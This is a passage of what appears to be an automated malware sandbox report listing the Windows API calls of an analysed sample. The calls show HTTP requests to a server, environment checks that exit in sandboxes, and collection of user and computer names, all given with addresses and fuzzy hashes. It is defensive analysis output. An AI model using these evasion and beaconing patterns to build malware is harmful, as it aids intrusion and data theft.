                                                  • HttpOpenRequestA.WININET(00000000,GET,?,02D4A0C8,00000000,00000000,00400100,00000000), ref: 00406385
                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                  • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                  • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                  • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                  • String ID: ERROR$ERROR$GET
                                                  • API String ID: 3074848878-2509457195
                                                  • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                  • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                  • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                  • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                                  Control-flow Graph (rendered graph not reproduced in text)
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcessstrtok_s
                                                  • String ID: block
                                                  • API String ID: 3407564107-2199623458
                                                  • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                  • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                  • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                  • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                                  Control-flow Graph (rendered graph not reproduced in text)
                                                  APIs
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                    • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                    • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                  • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                  • API String ID: 3630751533-2791005934
                                                  • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                  • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                  • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                  • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                                  Control-flow Graph (rendered graph not reproduced in text)
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                  • wsprintfA.USER32 ref: 00417640
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                  • String ID: :$C$\
                                                  • API String ID: 3790021787-3809124531
                                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                  Control-flow Graph (rendered graph not reproduced in text)
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02F0024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: 0f69fa3b09fe25b87bf24f3d4cc93b20ceab391222479f3d0b240f39a584ccac
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: 1D525B75A01229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB391DB30AA95DF14

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E40), ref: 004198A1
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E28), ref: 004198BA
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17EB8), ref: 004198D2
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E58), ref: 004198EA
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E70), ref: 00419903
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D45BF0), ref: 0041991B
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D12480), ref: 00419933
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D12300), ref: 0041994C
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E88), ref: 00419964
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17EA0), ref: 0041997C
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17ED0), ref: 00419995
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D17E10), ref: 004199AD
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D12320), ref: 004199C5
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,02D45FF8), ref: 004199DE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                    • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                    • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                    • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                    • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                    • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                    • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                    • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                    • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                  • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                    • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02D45BB0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                  • CloseHandle.KERNEL32(?,00000000,?,02D45BB0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 3511611419-0
                                                  • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                  • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                  • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                  • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                                  Control-flow Graph

                                                  APIs
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$CrackInternetlstrlen
                                                  • String ID: <
                                                  • API String ID: 1683549937-4251816714
                                                  • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                  • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                  • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                  • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                  Control-flow Graph

                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                  • __aulldiv.LIBCMT ref: 00401258
                                                  • __aulldiv.LIBCMT ref: 00401266
                                                  • ExitProcess.KERNEL32 ref: 00401294
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                  • String ID: @
                                                  • API String ID: 3404098578-2766056989
                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                  Control-flow Graph

                                                  APIs
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02D45BB0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                  • CloseHandle.KERNEL32(?,00000000,?,02D45BB0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                  • String ID:
                                                  • API String ID: 941982115-0
                                                  • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                  • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                  • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                  • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02D4AE30), ref: 00406303
                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02D4A0C8,00000000,00000000,00400100,00000000), ref: 00406385
                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                  • String ID: ERROR$ERROR
                                                  • API String ID: 3287882509-2579291623
                                                  • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                  • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                  • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                  • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocComputerNameProcess
                                                  • String ID:
                                                  • API String ID: 4203777966-0
                                                  • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                  • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                  • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                  • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                  • ExitProcess.KERNEL32 ref: 00401143
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                  • String ID:
                                                  • API String ID: 1103761159-0
                                                  • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                  • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                  • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                  • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D19D9E
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02D19DBE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D19000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2d19000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: bb056e6c7b6f609ab2e3c09b400357096893d3e07463f0a59642f21edeae7806
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: 3CF062325007117BD7207AB9BCACBEA76E8AF4A635F100528E647919C0DB70FC458A61
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000400,?,?,02F00223,?,?), ref: 02F00E19
                                                  • SetErrorMode.KERNEL32(00000000,?,?,02F00223,?,?), ref: 02F00E1E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: 45d8b9413bf6cb67591f2084faf88883303e7dd66208303ca186fed5f74efe4f
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: 5CD01232645228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4046EA
                                                  APIs
